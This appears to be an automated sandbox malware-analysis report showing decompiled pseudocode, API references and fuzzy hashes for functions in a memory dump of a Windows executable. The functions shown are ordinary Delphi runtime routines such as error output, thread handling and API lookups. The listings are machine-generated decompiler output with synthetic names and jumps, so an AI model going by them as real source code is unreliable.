                                                            0x004044f0
                                                            0x004044f5
                                                            0x004044f5
                                                            0x004044f7
                                                            0x004044f8
                                                            0x004044f9
                                                            0x004044fa
                                                            0x00404481
                                                            0x00404481
                                                            0x00404488
                                                            0x0040448a
                                                            0x00404490
                                                            0x00404492
                                                            0x00404494
                                                            0x00404499
                                                            0x0040449b
                                                            0x0040449d
                                                            0x0040449f
                                                            0x004044a1
                                                            0x004044ac
                                                            0x004044b1
                                                            0x004044b1
                                                            0x004044b3
                                                            0x004044b4
                                                            0x004044b5
                                                            0x0040448c
                                                            0x0040448c
                                                            0x0040448d
                                                            0x0040448e
                                                            0x0040448e
                                                            0x0040448a
                                                            0x0040447f

                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction ID: a6f3f7862a5743fd60f07ae337b35688b7a953487e66f12862dc3ba09d14b1d9
                                                            • Opcode Fuzzy Hash: ec1625ffc2fe51f8c31513aba64e24c59fd6eccf0fed4d7fd9cb209259156b9f
                                                            • Instruction Fuzzy Hash: 8CC115A27106000BD714AE7DDD8476AB68A9BC5716F28827FF244EB3D6DB7CCD418388
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041F7A0, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 131COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E0041F7A0(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				struct _MEMORY_BASIC_INFORMATION _v36;
				short _v558;
				char _v564;
				intOrPtr _v568;
				char _v572;
				char _v576;
				char _v580;
				intOrPtr _v584;
				char _v588;
				void* _v592;
				char _v596;
				char _v600;
				char _v604;
				char _v608;
				intOrPtr _v612;
				char _v616;
				char _v620;
				char _v624;
				void* _v628;
				char _v632;
				void* _t64;
				intOrPtr _t65;
				long _t76;
				intOrPtr _t82;
				intOrPtr _t103;
				intOrPtr _t107;
				intOrPtr _t110;
				intOrPtr _t112;
				intOrPtr _t115;
				intOrPtr _t127;
				void* _t136;
				intOrPtr _t138;
				void* _t141;
				void* _t143;

				_t136 = __edi;
				_t140 = _t141;
				_v632 = 0;
				_v596 = 0;
				_v604 = 0;
				_v600 = 0;
				_v8 = 0;
				_push(_t141);
				_push(0x41f9a6);
				_push( *[fs:eax]);
				 *[fs:eax] = _t141 + 0xfffffd8c;
				_t64 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x14)) - 1;
				_t143 = _t64;
				if(_t143 < 0) {
					_t65 =  *0x4ba798; // 0x40e730
					E0040C9F0(_t65,  &_v8, _t140);
				} else {
					if(_t143 == 0) {
						_t107 =  *0x4ba670; // 0x40e738
						E0040C9F0(_t107,  &_v8, _t140);
					} else {
						if(_t64 == 7) {
							_t110 =  *0x4ba4d0; // 0x40e740
							E0040C9F0(_t110,  &_v8, _t140);
						} else {
							_t112 =  *0x4ba5c8; // 0x40e748
							E0040C9F0(_t112,  &_v8, _t140);
						}
					}
				}
				_t115 =  *((intOrPtr*)( *((intOrPtr*)(_a4 - 4)) + 0x18));
				VirtualQuery( *( *((intOrPtr*)(_a4 - 4)) + 0xc),  &_v36, 0x1c);
				_t138 = _v36.State;
				if(_t138 == 0x1000 || _t138 == 0x10000) {
					_t76 = GetModuleFileNameW(_v36.AllocationBase,  &_v558, 0x105);
					_t147 = _t76;
					if(_t76 == 0) {
						goto L12;
					} else {
						_v592 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
						_v588 = 5;
						E0040858C( &_v600, 0x105,  &_v558);
						E0041A418(_v600, _t115,  &_v596, _t136, _t138, _t147);
						_v584 = _v596;
						_v580 = 0x11;
						_v576 = _v8;
						_v572 = 0x11;
						_v568 = _t115;
						_v564 = 5;
						_push( &_v592);
						_t103 =  *0x4ba6e0; // 0x40e810
						E0040C9F0(_t103,  &_v604, _t140, 3);
						E0041F2A0(_t115, _v604, 1, _t136, _t138);
					}
				} else {
					L12:
					_v628 =  *( *((intOrPtr*)(_a4 - 4)) + 0xc);
					_v624 = 5;
					_v620 = _v8;
					_v616 = 0x11;
					_v612 = _t115;
					_v608 = 5;
					_push( &_v628);
					_t82 =  *0x4ba67c; // 0x40e6d8
					E0040C9F0(_t82,  &_v632, _t140, 2);
					E0041F2A0(_t115, _v632, 1, _t136, _t138);
				}
				_pop(_t127);
				 *[fs:eax] = _t127;
				_push(0x41f9ad);
				E00407A20( &_v632);
				E00407A80( &_v604, 3);
				return E00407A20( &_v8);
			}






































                                                            0x0041f7a0
                                                            0x0041f7a1
                                                            0x0041f7ad
                                                            0x0041f7b3
                                                            0x0041f7b9
                                                            0x0041f7bf
                                                            0x0041f7c5
                                                            0x0041f7ca
                                                            0x0041f7cb
                                                            0x0041f7d0
                                                            0x0041f7d3
                                                            0x0041f7df
                                                            0x0041f7df
                                                            0x0041f7e2
                                                            0x0041f7f0
                                                            0x0041f7f5
                                                            0x0041f7e4
                                                            0x0041f7e4
                                                            0x0041f7ff
                                                            0x0041f804
                                                            0x0041f7e6
                                                            0x0041f7e9
                                                            0x0041f80e
                                                            0x0041f813
                                                            0x0041f7eb
                                                            0x0041f81d
                                                            0x0041f822
                                                            0x0041f822
                                                            0x0041f7e9
                                                            0x0041f7e4
                                                            0x0041f82d
                                                            0x0041f840
                                                            0x0041f845
                                                            0x0041f84e
                                                            0x0041f86c
                                                            0x0041f871
                                                            0x0041f873
                                                            0x00000000
                                                            0x0041f879
                                                            0x0041f882
                                                            0x0041f888
                                                            0x0041f8a0
                                                            0x0041f8b1
                                                            0x0041f8bc
                                                            0x0041f8c2
                                                            0x0041f8cc
                                                            0x0041f8d2
                                                            0x0041f8d9
                                                            0x0041f8df
                                                            0x0041f8ec
                                                            0x0041f8f5
                                                            0x0041f8fa
                                                            0x0041f90c
                                                            0x0041f911
                                                            0x0041f915
                                                            0x0041f915
                                                            0x0041f91e
                                                            0x0041f924
                                                            0x0041f92e
                                                            0x0041f934
                                                            0x0041f93b
                                                            0x0041f941
                                                            0x0041f94e
                                                            0x0041f957
                                                            0x0041f95c
                                                            0x0041f96e
                                                            0x0041f973
                                                            0x0041f977
                                                            0x0041f97a
                                                            0x0041f97d
                                                            0x0041f988
                                                            0x0041f998
                                                            0x0041f9a5

                                                            APIs
                                                            • VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F9A6), ref: 0041F840
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000105,?,?,0000001C,00000000,0041F9A6), ref: 0041F86C
                                                              • Part of subcall function 0040C9F0: LoadStringW.USER32(00000000,00010000,?,00001000), ref: 0040CA35
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileLoadModuleNameQueryStringVirtual
                                                            • String ID: 0@$8@$@@$H@
                                                            • API String ID: 902310565-4161625419
                                                            • Opcode ID: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction ID: bbc3c026f35d1d6bea3ad9012fddeafd4c483e803022796d8e8ef386e34d3195
                                                            • Opcode Fuzzy Hash: 2bcb5d97eafe9ae16bdb5e5d20f221eb3d58e794d65a866e62d276be447e8c2a
                                                            • Instruction Fuzzy Hash: 69511874A04258DFCB10EF69CC89BCDB7F4AB48304F0042E6A808A7351D778AE85CF59
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406688, Relevance: 10.6, APIs: 7, Instructions: 130threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 88%
                                                            			E00406688(signed char* __eax, void* __edx, void* __eflags) {
				void* _t49;
				signed char _t56;
				intOrPtr _t57;
				signed char _t59;
				void* _t70;
				signed char* _t71;
				intOrPtr _t72;
				signed char* _t73;

				_t70 = __edx;
				_t71 = __eax;
				_t72 =  *((intOrPtr*)(__eax + 0x10));
				while(1) {
					L1:
					 *_t73 = E00406B30(_t71);
					if( *_t73 != 0 || _t70 == 0) {
						break;
					}
					_t73[1] = 0;
					if(_t72 <= 0) {
						while(1) {
							L17:
							_t56 =  *_t71;
							if(_t56 == 0) {
								goto L1;
							}
							asm("lock cmpxchg [esi], edx");
							if(_t56 != _t56) {
								continue;
							} else {
								goto L19;
							}
							do {
								L19:
								_t73[4] = GetTickCount();
								E0040688C(_t71);
								_t57 =  *0x4bb8f8; // 0x4b9284
								 *((intOrPtr*)(_t57 + 0x10))();
								 *_t73 = 0 == 0;
								if(_t70 != 0xffffffff) {
									_t73[8] = GetTickCount();
									if(_t70 <= _t73[8] - _t73[4]) {
										_t70 = 0;
									} else {
										_t70 = _t70 - _t73[8] - _t73[4];
									}
								}
								if( *_t73 == 0) {
									do {
										asm("lock cmpxchg [esi], edx");
									} while ( *_t71 !=  *_t71);
									_t73[1] = 1;
								} else {
									while(1) {
										_t59 =  *_t71;
										if((_t59 & 0x00000001) != 0) {
											goto L29;
										}
										asm("lock cmpxchg [esi], edx");
										if(_t59 != _t59) {
											continue;
										}
										_t73[1] = 1;
										goto L29;
									}
								}
								L29:
							} while (_t73[1] == 0);
							if( *_t73 != 0) {
								_t71[8] = GetCurrentThreadId();
								_t71[4] = 1;
							}
							goto L32;
						}
						continue;
					}
					_t73[4] = GetTickCount();
					_t73[0xc] = 0;
					if(_t72 <= 0) {
						L13:
						if(_t70 == 0xffffffff) {
							goto L17;
						}
						_t73[8] = GetTickCount();
						_t49 = _t73[8] - _t73[4];
						if(_t70 > _t49) {
							_t70 = _t70 - _t49;
							goto L17;
						}
						 *_t73 = 0;
						break;
					}
					L5:
					L5:
					if(_t70 == 0xffffffff || _t70 > GetTickCount() - _t73[4]) {
						goto L8;
					} else {
						 *_t73 = 0;
					}
					break;
					L8:
					if( *_t71 > 1) {
						goto L13;
					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}











                                                            0x0040668f
                                                            0x00406691
                                                            0x00406693
                                                            0x00406696
                                                            0x00406696
                                                            0x0040669d
                                                            0x004066a4
                                                            0x00000000
                                                            0x00000000
                                                            0x004066b2
                                                            0x004066b9
                                                            0x00406751
                                                            0x00406751
                                                            0x00406751
                                                            0x00406755
                                                            0x00000000
                                                            0x00000000
                                                            0x00406760
                                                            0x00406766
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00406768
                                                            0x00406768
                                                            0x0040676d
                                                            0x00406773
                                                            0x0040677a
                                                            0x00406784
                                                            0x00406789
                                                            0x00406790
                                                            0x00406797
                                                            0x004067a5
                                                            0x004067b3
                                                            0x004067a7
                                                            0x004067af
                                                            0x004067af
                                                            0x004067a5
                                                            0x004067b9
                                                            0x004067db
                                                            0x004067e4
                                                            0x004067e8
                                                            0x004067ec
                                                            0x00000000
                                                            0x004067bb
                                                            0x004067bb
                                                            0x004067c0
                                                            0x00000000
                                                            0x00000000
                                                            0x004067cc
                                                            0x004067d2
                                                            0x00000000
                                                            0x00000000
                                                            0x004067d4
                                                            0x00000000
                                                            0x004067d4
                                                            0x004067bb
                                                            0x004067f1
                                                            0x004067f1
                                                            0x00406800
                                                            0x00406807
                                                            0x0040680a
                                                            0x0040680a
                                                            0x00000000
                                                            0x00406800
                                                            0x00000000
                                                            0x00406751
                                                            0x004066c4
                                                            0x004066ca
                                                            0x004066d0
                                                            0x0040672c
                                                            0x0040672f
                                                            0x00000000
                                                            0x00000000
                                                            0x00406736
                                                            0x0040673e
                                                            0x00406744
                                                            0x0040674f
                                                            0x00000000
                                                            0x0040674f
                                                            0x00406746
                                                            0x00000000
                                                            0x00406746
                                                            0x00000000
                                                            0x004066d2
                                                            0x004066d5
                                                            0x00000000
                                                            0x004066e4
                                                            0x004066e4
                                                            0x004066e4
                                                            0x00000000
                                                            0x004066ed
                                                            0x004066f0
                                                            0x00000000
                                                            0x00000000
                                                            0x004066f5
                                                            0x0040671e
                                                            0x00406722
                                                            0x00406727
                                                            0x0040672a
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x0040672a
                                                            0x004066fe
                                                            0x00406704
                                                            0x00000000
                                                            0x00000000
                                                            0x0040670b
                                                            0x0040670e
                                                            0x00406715
                                                            0x00000000
                                                            0x00406715
                                                            0x00406811
                                                            0x0040681c

                                                            APIs
                                                              • Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33
                                                            • GetTickCount.KERNEL32 ref: 004066BF
                                                            • GetTickCount.KERNEL32 ref: 004066D7
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406706
                                                            • GetTickCount.KERNEL32 ref: 00406731
                                                            • GetTickCount.KERNEL32 ref: 00406768
                                                            • GetTickCount.KERNEL32 ref: 00406792
                                                            • GetCurrentThreadId.KERNEL32 ref: 00406802
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CountTick$CurrentThread
                                                            • String ID:
                                                            • API String ID: 3968769311-0
                                                            • Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
                                                            • Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
                                                            • Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 80%
                                                            			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}


















                                                            0x004971ac
                                                            0x004971ac
                                                            0x004971ac
                                                            0x004971ad
                                                            0x004971af
                                                            0x004971b6
                                                            0x004971bb
                                                            0x004971bd
                                                            0x004971c0
                                                            0x004971c0
                                                            0x004971c5
                                                            0x004971c7
                                                            0x004971ca
                                                            0x004971ce
                                                            0x004971cf
                                                            0x004971d4
                                                            0x004971d7
                                                            0x004971de
                                                            0x004971e3
                                                            0x004971e9
                                                            0x004971ee
                                                            0x004971f6
                                                            0x004971fa
                                                            0x004971fa
                                                            0x004971fa
                                                            0x004971fc
                                                            0x00497203
                                                            0x00497284
                                                            0x0049728c
                                                            0x00497205
                                                            0x00497209
                                                            0x0049722c
                                                            0x0049723e
                                                            0x0049720b
                                                            0x00497211
                                                            0x00497224
                                                            0x00497224
                                                            0x00497245
                                                            0x00497251
                                                            0x00497259
                                                            0x0049725c
                                                            0x00497266
                                                            0x00497273
                                                            0x00497278
                                                            0x00497278
                                                            0x00497245
                                                            0x00497291
                                                            0x00497294
                                                            0x00497297
                                                            0x004972a4

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247
                                                              • Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A
                                                            • GetCurrentThread.KERNEL32 ref: 0049727F
                                                            • GetCurrentThreadId.KERNEL32 ref: 00497287
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$Current$CreateErrorLast
                                                            • String ID: 0@G$XtI$l@
                                                            • API String ID: 3539746228-385768319
                                                            • Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
                                                            • Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
                                                            • Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 36%
                                                            			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}












                                                            0x00406425
                                                            0x00406427
                                                            0x0040642c
                                                            0x00406446
                                                            0x004064d9
                                                            0x004064d9
                                                            0x00000000
                                                            0x0040644c
                                                            0x0040644c
                                                            0x0040644f
                                                            0x00406450
                                                            0x00406452
                                                            0x00406459
                                                            0x00000000
                                                            0x00406465
                                                            0x0040646d
                                                            0x00406472
                                                            0x00406473
                                                            0x00406478
                                                            0x0040647b
                                                            0x00406481
                                                            0x00406485
                                                            0x00406486
                                                            0x0040648b
                                                            0x00406492
                                                            0x004064bc
                                                            0x004064be
                                                            0x004064c1
                                                            0x004064c4
                                                            0x004064d1
                                                            0x00406494
                                                            0x00406494
                                                            0x004064af
                                                            0x004064b2
                                                            0x004064ba
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x004064ba
                                                            0x004064a5
                                                            0x004064a8
                                                            0x004064e0
                                                            0x004064e6
                                                            0x004064e6
                                                            0x00406492
                                                            0x00406459
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
                                                            • GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AddressErrorHandleLastModuleProc
                                                            • String ID: @$GetLogicalProcessorInformation$kernel32.dll
                                                            • API String ID: 4275029093-79381301
                                                            • Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
                                                            • Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
                                                            • Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 43%
                                                            			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}






                                                            0x004076c0
                                                            0x00407726
                                                            0x00407728
                                                            0x0040772a
                                                            0x0040772f
                                                            0x00407734
                                                            0x00407736
                                                            0x00407736
                                                            0x0040773c
                                                            0x004076c2
                                                            0x004076cb
                                                            0x004076db
                                                            0x004076db
                                                            0x004076f7
                                                            0x0040770a
                                                            0x0040771e
                                                            0x0040771e

                                                            APIs
                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                            • GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                            • WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: FileHandleWrite
                                                            • String ID: Error$Runtime error at 00000000
                                                            • API String ID: 3320372497-2970929446
                                                            • Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
                                                            • Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
                                                            • Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}





                                                            0x00420532
                                                            0x0042055f
                                                            0x00420564
                                                            0x00420569
                                                            0x00420573
                                                            0x00420534
                                                            0x00420544
                                                            0x00420549
                                                            0x0042054e
                                                            0x0042054e

                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E
                                                              • Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2
                                                            • GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.320866610.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000005.00000002.320858032.0000000000400000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321002080.00000000004B7000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321026547.00000000004C0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321038528.00000000004C4000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000005.00000002.321065372.00000000004C6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: HandleModule$AddressProc
                                                            • String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
